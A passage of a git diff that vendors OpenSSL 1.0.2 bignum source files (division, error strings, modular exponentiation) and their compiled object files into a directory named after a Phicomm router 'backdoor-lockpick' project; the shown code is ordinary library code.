+            fprintf(stderr, "DEBUG: bn_div_words(0x%08X,0x%08X,0x%08\
+X) -> 0x%08X\n", n0, n1, d0, q);
+#    endif
+#   endif
+
+#   ifndef REMAINDER_IS_ALREADY_CALCULATED
+            /*
+             * rem doesn't have to be BN_ULLONG. The least we
+             * know it's less that d0, isn't it?
+             */
+            rem = (n1 - q * d0) & BN_MASK2;
+#   endif
+            t2 = (BN_ULLONG) d1 *q;
+
+            for (;;) {
+                if (t2 <= ((((BN_ULLONG) rem) << BN_BITS2) | wnump[-2]))
+                    break;
+                q--;
+                rem += d0;
+                if (rem < d0)
+                    break;      /* don't let rem overflow */
+                t2 -= d1;
+            }
+#  else                         /* !BN_LLONG */
+            BN_ULONG t2l, t2h;
+
+            q = bn_div_words(n0, n1, d0);
+#   ifdef BN_DEBUG_LEVITTE
+            fprintf(stderr, "DEBUG: bn_div_words(0x%08X,0x%08X,0x%08\
+X) -> 0x%08X\n", n0, n1, d0, q);
+#   endif
+#   ifndef REMAINDER_IS_ALREADY_CALCULATED
+            rem = (n1 - q * d0) & BN_MASK2;
+#   endif
+
+#   if defined(BN_UMULT_LOHI)
+            BN_UMULT_LOHI(t2l, t2h, d1, q);
+#   elif defined(BN_UMULT_HIGH)
+            t2l = d1 * q;
+            t2h = BN_UMULT_HIGH(d1, q);
+#   else
+            {
+                BN_ULONG ql, qh;
+                t2l = LBITS(d1);
+                t2h = HBITS(d1);
+                ql = LBITS(q);
+                qh = HBITS(q);
+                mul64(t2l, t2h, ql, qh); /* t2=(BN_ULLONG)d1*q; */
+            }
+#   endif
+
+            for (;;) {
+                if ((t2h < rem) || ((t2h == rem) && (t2l <= wnump[-2])))
+                    break;
+                q--;
+                rem += d0;
+                if (rem < d0)
+                    break;      /* don't let rem overflow */
+                if (t2l < d1)
+                    t2h--;
+                t2l -= d1;
+            }
+#  endif                        /* !BN_LLONG */
+        }
+# endif                         /* !BN_DIV3W */
+
+        l0 = bn_mul_words(tmp->d, sdiv->d, div_n, q);
+        tmp->d[div_n] = l0;
+        wnum.d--;
+        /*
+         * ingore top values of the bignums just sub the two BN_ULONG arrays
+         * with bn_sub_words
+         */
+        if (bn_sub_words(wnum.d, wnum.d, tmp->d, div_n + 1)) {
+            /*
+             * Note: As we have considered only the leading two BN_ULONGs in
+             * the calculation of q, sdiv * q might be greater than wnum (but
+             * then (q-1) * sdiv is less or equal than wnum)
+             */
+            q--;
+            if (bn_add_words(wnum.d, wnum.d, sdiv->d, div_n))
+                /*
+                 * we can't have an overflow here (assuming that q != 0, but
+                 * if q == 0 then tmp is zero anyway)
+                 */
+                (*wnump)++;
+        }
+        /* store part of the result */
+        *resp = q;
+    }
+    bn_correct_top(snum);
+    if (rm != NULL) {
+        /*
+         * Keep a copy of the neg flag in num because if rm==num BN_rshift()
+         * will overwrite it.
+         */
+        int neg = num->neg;
+        BN_rshift(rm, snum, norm_shift);
+        if (!BN_is_zero(rm))
+            rm->neg = neg;
+        bn_check_top(rm);
+    }
+    if (no_branch)
+        bn_correct_top(res);
+    BN_CTX_end(ctx);
+    return (1);
+ err:
+    bn_check_top(rm);
+    BN_CTX_end(ctx);
+    return (0);
+}
+#endif
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_div.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_div.o
new file mode 100644
index 0000000000000000000000000000000000000000..0deed322136050c2d6a2462c654adcd796aacfbc
GIT binary patch
literal 4264
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
IIXBz?2f0VMTL1t6

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_err.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_err.c
new file mode 100644
index 0000000..faa7e22
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_err.c
@@ -0,0 +1,150 @@
+/* crypto/bn/bn_err.c */
+/* ====================================================================
+ * Copyright (c) 1999-2007 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.OpenSSL.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@OpenSSL.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.OpenSSL.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+/*
+ * NOTE: this file was auto generated by the mkerr.pl script: any changes
+ * made to it will be overwritten when the script next updates this file,
+ * only reason strings will be preserved.
+ */
+
+#include <stdio.h>
+#include <openssl/err.h>
+#include <openssl/bn.h>
+
+/* BEGIN ERROR CODES */
+#ifndef OPENSSL_NO_ERR
+
+# define ERR_FUNC(func) ERR_PACK(ERR_LIB_BN,func,0)
+# define ERR_REASON(reason) ERR_PACK(ERR_LIB_BN,0,reason)
+
+static ERR_STRING_DATA BN_str_functs[] = {
+    {ERR_FUNC(BN_F_BNRAND), "BNRAND"},
+    {ERR_FUNC(BN_F_BN_BLINDING_CONVERT_EX), "BN_BLINDING_convert_ex"},
+    {ERR_FUNC(BN_F_BN_BLINDING_CREATE_PARAM), "BN_BLINDING_create_param"},
+    {ERR_FUNC(BN_F_BN_BLINDING_INVERT_EX), "BN_BLINDING_invert_ex"},
+    {ERR_FUNC(BN_F_BN_BLINDING_NEW), "BN_BLINDING_new"},
+    {ERR_FUNC(BN_F_BN_BLINDING_UPDATE), "BN_BLINDING_update"},
+    {ERR_FUNC(BN_F_BN_BN2DEC), "BN_bn2dec"},
+    {ERR_FUNC(BN_F_BN_BN2HEX), "BN_bn2hex"},
+    {ERR_FUNC(BN_F_BN_CTX_GET), "BN_CTX_get"},
+    {ERR_FUNC(BN_F_BN_CTX_NEW), "BN_CTX_new"},
+    {ERR_FUNC(BN_F_BN_CTX_START), "BN_CTX_start"},
+    {ERR_FUNC(BN_F_BN_DIV), "BN_div"},
+    {ERR_FUNC(BN_F_BN_DIV_NO_BRANCH), "BN_div_no_branch"},
+    {ERR_FUNC(BN_F_BN_DIV_RECP), "BN_div_recp"},
+    {ERR_FUNC(BN_F_BN_EXP), "BN_exp"},
+    {ERR_FUNC(BN_F_BN_EXPAND2), "bn_expand2"},
+    {ERR_FUNC(BN_F_BN_EXPAND_INTERNAL), "BN_EXPAND_INTERNAL"},
+    {ERR_FUNC(BN_F_BN_GF2M_MOD), "BN_GF2m_mod"},
+    {ERR_FUNC(BN_F_BN_GF2M_MOD_EXP), "BN_GF2m_mod_exp"},
+    {ERR_FUNC(BN_F_BN_GF2M_MOD_MUL), "BN_GF2m_mod_mul"},
+    {ERR_FUNC(BN_F_BN_GF2M_MOD_SOLVE_QUAD), "BN_GF2m_mod_solve_quad"},
+    {ERR_FUNC(BN_F_BN_GF2M_MOD_SOLVE_QUAD_ARR), "BN_GF2m_mod_solve_quad_arr"},
+    {ERR_FUNC(BN_F_BN_GF2M_MOD_SQR), "BN_GF2m_mod_sqr"},
+    {ERR_FUNC(BN_F_BN_GF2M_MOD_SQRT), "BN_GF2m_mod_sqrt"},
+    {ERR_FUNC(BN_F_BN_MOD_EXP2_MONT), "BN_mod_exp2_mont"},
+    {ERR_FUNC(BN_F_BN_MOD_EXP_MONT), "BN_mod_exp_mont"},
+    {ERR_FUNC(BN_F_BN_MOD_EXP_MONT_CONSTTIME), "BN_mod_exp_mont_consttime"},
+    {ERR_FUNC(BN_F_BN_MOD_EXP_MONT_WORD), "BN_mod_exp_mont_word"},
+    {ERR_FUNC(BN_F_BN_MOD_EXP_RECP), "BN_mod_exp_recp"},
+    {ERR_FUNC(BN_F_BN_MOD_EXP_SIMPLE), "BN_mod_exp_simple"},
+    {ERR_FUNC(BN_F_BN_MOD_INVERSE), "BN_mod_inverse"},
+    {ERR_FUNC(BN_F_BN_MOD_INVERSE_NO_BRANCH), "BN_mod_inverse_no_branch"},
+    {ERR_FUNC(BN_F_BN_MOD_LSHIFT_QUICK), "BN_mod_lshift_quick"},
+    {ERR_FUNC(BN_F_BN_MOD_MUL_RECIPROCAL), "BN_mod_mul_reciprocal"},
+    {ERR_FUNC(BN_F_BN_MOD_SQRT), "BN_mod_sqrt"},
+    {ERR_FUNC(BN_F_BN_MPI2BN), "BN_mpi2bn"},
+    {ERR_FUNC(BN_F_BN_NEW), "BN_new"},
+    {ERR_FUNC(BN_F_BN_RAND), "BN_rand"},
+    {ERR_FUNC(BN_F_BN_RAND_RANGE), "BN_rand_range"},
+    {ERR_FUNC(BN_F_BN_USUB), "BN_usub"},
+    {0, NULL}
+};
+
+static ERR_STRING_DATA BN_str_reasons[] = {
+    {ERR_REASON(BN_R_ARG2_LT_ARG3), "arg2 lt arg3"},
+    {ERR_REASON(BN_R_BAD_RECIPROCAL), "bad reciprocal"},
+    {ERR_REASON(BN_R_BIGNUM_TOO_LONG), "bignum too long"},
+    {ERR_REASON(BN_R_CALLED_WITH_EVEN_MODULUS), "called with even modulus"},
+    {ERR_REASON(BN_R_DIV_BY_ZERO), "div by zero"},
+    {ERR_REASON(BN_R_ENCODING_ERROR), "encoding error"},
+    {ERR_REASON(BN_R_EXPAND_ON_STATIC_BIGNUM_DATA),
+     "expand on static bignum data"},
+    {ERR_REASON(BN_R_INPUT_NOT_REDUCED), "input not reduced"},
+    {ERR_REASON(BN_R_INVALID_LENGTH), "invalid length"},
+    {ERR_REASON(BN_R_INVALID_RANGE), "invalid range"},
+    {ERR_REASON(BN_R_NOT_A_SQUARE), "not a square"},
+    {ERR_REASON(BN_R_NOT_INITIALIZED), "not initialized"},
+    {ERR_REASON(BN_R_NO_INVERSE), "no inverse"},
+    {ERR_REASON(BN_R_NO_SOLUTION), "no solution"},
+    {ERR_REASON(BN_R_P_IS_NOT_PRIME), "p is not prime"},
+    {ERR_REASON(BN_R_TOO_MANY_ITERATIONS), "too many iterations"},
+    {ERR_REASON(BN_R_TOO_MANY_TEMPORARY_VARIABLES),
+     "too many temporary variables"},
+    {0, NULL}
+};
+
+#endif
+
+void ERR_load_BN_strings(void)
+{
+#ifndef OPENSSL_NO_ERR
+
+    if (ERR_func_error_string(BN_str_functs[0].error) == NULL) {
+        ERR_load_strings(0, BN_str_functs);
+        ERR_load_strings(0, BN_str_reasons);
+    }
+#endif
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_err.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_err.o
new file mode 100644
index 0000000000000000000000000000000000000000..2db8358317e02db9d6ca87301aab66778b130c2d
GIT binary patch
literal 1360
zcmbtT-AV#M6h7Np_9JA`MPP_sRg{DFL)1k`V%|iA5OfpEs+&c+%I*l(MZJQL(jy4H
zK#$R7(OoxnjytoClM&Q`*>lb}=Q}?$vk!&iqcOt(DFz(Cz>_Gz>Da)|_01f_U<Tf2
zlOIn|%;)!0t7ql5%iF0vw#72(>~6d7X74vMEVI29zz{)h9M?Fm;>j6c+8$vhE|P^n
zfpJ#?qZ2n0vFKzM8zOv3>=E}jp&26Z_Bkrf962HNpbV)H&9FNKMAPg~F^rLC!o+v5
zk4JyN=>&#l8r^xN&v53lYdN0BDo`kuta{U~T8Af=&%JB6<|8L1($FMB(=h+G!R<0I
zj1Baaw7ApZz^XR4ft7t9Sf$x$I4)vtlRFHrDeZH+awGhj+h#4V*>XI73(RxsHgm45
zOV4gNqWC{l0=aZ|`U&Pl&hQ+BPqC^jqeGZ{Pjasy4NdF(72Kc1^;iA|aw%s9mnyRU
zx(cE#>r1_(U}|Vfbrf6jBt&)Sl?~lJ`jVeQTNRpBl?!wzr_S$+Abl>Ke~xkVnsXvv
zs%O#Yq5!5)Q=gJA@lmyj(xVT`YoLJs56YqQ3DfV6D379kk{m?@93pdQjpDzEz*-m?
H7&`w8BwtSE

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_exp.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_exp.c
new file mode 100644
index 0000000..28a9fd5
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_exp.c
@@ -0,0 +1,1400 @@
+/* crypto/bn/bn_exp.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2005 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+
+#include "cryptlib.h"
+#include "bn_lcl.h"
+
+#include <stdlib.h>
+#ifdef _WIN32
+# include <malloc.h>
+# ifndef alloca
+#  define alloca _alloca
+# endif
+#elif defined(__GNUC__)
+# ifndef alloca
+#  define alloca(s) __builtin_alloca((s))
+# endif
+#elif defined(__sun)
+# include <alloca.h>
+#endif
+
+#undef RSAZ_ENABLED
+#if defined(OPENSSL_BN_ASM_MONT) && \
+        (defined(__x86_64) || defined(__x86_64__) || \
+         defined(_M_AMD64) || defined(_M_X64))
+# include "rsaz_exp.h"
+# define RSAZ_ENABLED
+#endif
+
+#undef SPARC_T4_MONT
+#if defined(OPENSSL_BN_ASM_MONT) && (defined(__sparc__) || defined(__sparc))
+# include "sparc_arch.h"
+extern unsigned int OPENSSL_sparcv9cap_P[];
+# define SPARC_T4_MONT
+#endif
+
+/* maximum precomputation table size for *variable* sliding windows */
+#define TABLE_SIZE      32
+
+/* this one works - simple but works */
+int BN_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, BN_CTX *ctx)
+{
+    int i, bits, ret = 0;
+    BIGNUM *v, *rr;
+
+    if (BN_get_flags(p, BN_FLG_CONSTTIME) != 0) {
+        /* BN_FLG_CONSTTIME only supported by BN_mod_exp_mont() */
+        BNerr(BN_F_BN_EXP, ERR_R_SHOULD_NOT_HAVE_BEEN_CALLED);
+        return -1;
+    }
+
+    BN_CTX_start(ctx);
+    if ((r == a) || (r == p))
+        rr = BN_CTX_get(ctx);
+    else
+        rr = r;
+    v = BN_CTX_get(ctx);
+    if (rr == NULL || v == NULL)
+        goto err;
+
+    if (BN_copy(v, a) == NULL)
+        goto err;
+    bits = BN_num_bits(p);
+
+    if (BN_is_odd(p)) {
+        if (BN_copy(rr, a) == NULL)
+            goto err;
+    } else {
+        if (!BN_one(rr))
+            goto err;
+    }
+
+    for (i = 1; i < bits; i++) {
+        if (!BN_sqr(v, v, ctx))
+            goto err;
+        if (BN_is_bit_set(p, i)) {
+            if (!BN_mul(rr, rr, v, ctx))
+                goto err;
+        }
+    }
+    ret = 1;
+ err:
+    if (r != rr)
+        BN_copy(r, rr);
+    BN_CTX_end(ctx);
+    bn_check_top(r);
+    return (ret);
+}
+
+int BN_mod_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, const BIGNUM *m,
+               BN_CTX *ctx)
+{
+    int ret;
+
+    bn_check_top(a);
+    bn_check_top(p);
+    bn_check_top(m);
+
+    /*-
+     * For even modulus  m = 2^k*m_odd,  it might make sense to compute
+     * a^p mod m_odd  and  a^p mod 2^k  separately (with Montgomery
+     * exponentiation for the odd part), using appropriate exponent
+     * reductions, and combine the results using the CRT.
+     *
+     * For now, we use Montgomery only if the modulus is odd; otherwise,
+     * exponentiation using the reciprocal-based quick remaindering
+     * algorithm is used.
+     *
+     * (Timing obtained with expspeed.c [computations  a^p mod m
+     * where  a, p, m  are of the same length: 256, 512, 1024, 2048,
+     * 4096, 8192 bits], compared to the running time of the
+     * standard algorithm:
+     *
+     *   BN_mod_exp_mont   33 .. 40 %  [AMD K6-2, Linux, debug configuration]
+     *                     55 .. 77 %  [UltraSparc processor, but
+     *                                  debug-solaris-sparcv8-gcc conf.]
+     *
+     *   BN_mod_exp_recp   50 .. 70 %  [AMD K6-2, Linux, debug configuration]
+     *                     62 .. 118 % [UltraSparc, debug-solaris-sparcv8-gcc]
+     *
+     * On the Sparc, BN_mod_exp_recp was faster than BN_mod_exp_mont
+     * at 2048 and more bits, but at 512 and 1024 bits, it was
+     * slower even than the standard algorithm!
+     *
+     * "Real" timings [linux-elf, solaris-sparcv9-gcc configurations]
+     * should be obtained when the new Montgomery reduction code
+     * has been integrated into OpenSSL.)
+     */
+
+#define MONT_MUL_MOD
+#define MONT_EXP_WORD
+#define RECP_MUL_MOD
+
+#ifdef MONT_MUL_MOD
+    /*
+     * I have finally been able to take out this pre-condition of the top bit
+     * being set.  It was caused by an error in BN_div with negatives.  There
+     * was also another problem when for a^b%m a >= m.  eay 07-May-97
+     */
+    /* if ((m->d[m->top-1]&BN_TBIT) && BN_is_odd(m)) */
+
+    if (BN_is_odd(m)) {
+# ifdef MONT_EXP_WORD
+        if (a->top == 1 && !a->neg
+            && (BN_get_flags(p, BN_FLG_CONSTTIME) == 0)) {
+            BN_ULONG A = a->d[0];
+            ret = BN_mod_exp_mont_word(r, A, p, m, ctx, NULL);
+        } else
+# endif
+            ret = BN_mod_exp_mont(r, a, p, m, ctx, NULL);
+    } else
+#endif
+#ifdef RECP_MUL_MOD
+    {
+        ret = BN_mod_exp_recp(r, a, p, m, ctx);
+    }
+#else
+    {
+        ret = BN_mod_exp_simple(r, a, p, m, ctx);
+    }
+#endif
+
+    bn_check_top(r);
+    return (ret);
+}
+
+int BN_mod_exp_recp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                    const BIGNUM *m, BN_CTX *ctx)
+{
+    int i, j, bits, ret = 0, wstart, wend, window, wvalue;
+    int start = 1;
+    BIGNUM *aa;
+    /* Table of variables obtained from 'ctx' */
+    BIGNUM *val[TABLE_SIZE];
